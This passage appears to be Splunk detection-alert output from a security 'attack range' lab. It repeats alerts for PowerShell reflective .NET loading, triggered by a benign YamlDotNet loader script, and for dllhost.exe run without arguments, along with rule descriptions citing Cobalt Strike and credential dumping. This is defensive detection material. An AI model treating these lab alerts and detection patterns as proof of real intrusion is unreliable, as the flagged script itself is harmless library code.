($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664845200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664845200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6868", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664845200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664845200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1ad4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664848532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664848532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664848532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664848532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664841600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664841600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="708", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664841600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664841600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x2c4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664844932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T23:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T23:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664844932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T23:16:29", info_max_time="+Infinity", info_min_time="0.000", 